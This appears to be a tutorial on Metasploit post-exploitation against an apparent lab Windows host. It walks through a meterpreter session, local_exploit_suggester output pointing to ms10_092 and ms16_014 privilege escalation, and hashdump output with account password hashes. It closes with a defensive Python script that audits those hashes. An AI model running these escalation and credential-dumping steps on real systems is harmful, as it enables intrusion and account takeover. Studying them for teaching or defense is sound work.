Post-exploitation operations
The post modules in msf are post-exploitation modules. They contain all sorts of functionality that can be useful after compromise, most of it information gathering.

Here I will walk through what to do after obtaining a cmd shell:

As you can see, I have one meterpreter session listed under sessions:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  liuwx-PC\liuwx @ LIUWX-PC     192.168.119.136:8888 -> 192.168.119.139:49162 (192.168.119.139)

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter >
During post-exploitation, post modules such as the following can assist us:

post/multi/recon/local_exploit_suggester
post/windows/gather/hashdump
post/windows/gather/smart_hashdump
post/multi/gather/firefox_creds
post/multi/gather/ssh_creds
post/windows/gather/enumapplicatio ...
and so on
post/multi/recon/local_exploit_suggester
Suppose we have obtained a cmd shell but with low privileges. This module suggests local exploits that may allow privilege escalation:
Here is its description:
msf5 > info post/multi/recon/local_exploit_suggester

       Name: Multi Recon Local Exploit Suggester
     Module: post/multi/recon/local_exploit_suggester
   Platform: Unknown, Windows, Netware, Android, Java, R, Ruby, Linux, Cisco, Juniper, Unifi, Brocade, Solaris, OSX, BSD, OpenBSD, BSDi, NetBSD, FreeBSD, AIX, HPUX, Irix, Unix, PHP, JavaScript, Python, NodeJS, Firefox, Mainframe, Multi, Hardware, Apple_iOS
       Arch:
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>
  Mo

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  SESSION                           yes       The session to run this module on
  SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

Description:
  This module suggests local meterpreter exploits that can be used.
  The exploits are suggested based on the architecture and platform
  that the user has a shell opened as well as the available exploits
  in meterpreter. It's important to note that not all local exploits
  will be fired. Exploits are chosen based on these conditions:
  session type, platform, architecture, and required default options.
From the banner above you can see that it supports a large number of platforms, such as Windows, Android, and so on.
Running it takes a while, because it queries systeminfo to see which patches are missing and from that works out which exploits could be used for privilege escalation:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.119.139 - Collecting local exploits for x64/windows...
[*] 192.168.119.139 - 11 exploit checks are being tried...
[+] 192.168.119.139 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.119.139 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.

Once the run finishes, msf has given us two exploits:

exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.

I failed to escalate privileges with ms10_092_schelevator, and then succeeded with the second one listed above!

hashdump
hashdump dumps the local account password hashes (in pwdump format: user:RID:LM hash:NT hash:::).
You sometimes need to collect these hashes in order to attack other accounts.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1001:aad3b435b51404eeaad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::
liuwx:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
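As an added example (not part of the original post), here is a Python script that parses the pwdump-format output of hashdump and flags what an administrator should act on: accounts whose NT hash is the hash of an empty password, and accounts for which a real LM hash is still stored (LM storage not disabled). The sample input is the hashdump output shown above; the two constants are the standard empty-password LM and NT hash values.

```python
import re
from dataclasses import dataclass

# Standard constants: LM field when no LM hash is stored, and the NT hash
# (MD4 of the empty UTF-16LE string) of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line format as printed by meterpreter's hashdump: user:RID:LM:NT:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

@dataclass
class Finding:
    user: str
    rid: int
    empty_password: bool   # NT hash equals the empty-password hash
    lm_stored: bool        # a real LM hash is present (weak, crackable format)

def parse_pwdump(line: str):
    """Parse one hashdump line; return (user, rid, lm, nt) or None if it is not a hash line."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return user, int(rid), lm.lower(), nt.lower()

def audit_hashdump(text: str) -> list:
    """Return one Finding per parsed account; prompts and status lines are skipped."""
    findings = []
    for line in text.splitlines():
        parsed = parse_pwdump(line)
        if parsed is None:
            continue
        user, rid, lm, nt = parsed
        findings.append(Finding(user, rid, nt == EMPTY_NT, lm != EMPTY_LM))
    return findings

# Sample input copied from the hashdump output shown on this page
SAMPLE = """meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1001:aad3b435b51404eeaad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::
liuwx:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for f in audit_hashdump(SAMPLE):
        flags = [n for n, hit in (("EMPTY PASSWORD", f.empty_password),
                                  ("LM HASH STORED", f.lm_stored)) if hit]
        print(f"{f.user} (RID {f.rid}): {', '.join(flags) or 'ok'}")
```

An empty NT hash on a built-in account such as Administrator or Guest usually means the account is disabled with no password set; it becomes a real risk if the account is ever enabled.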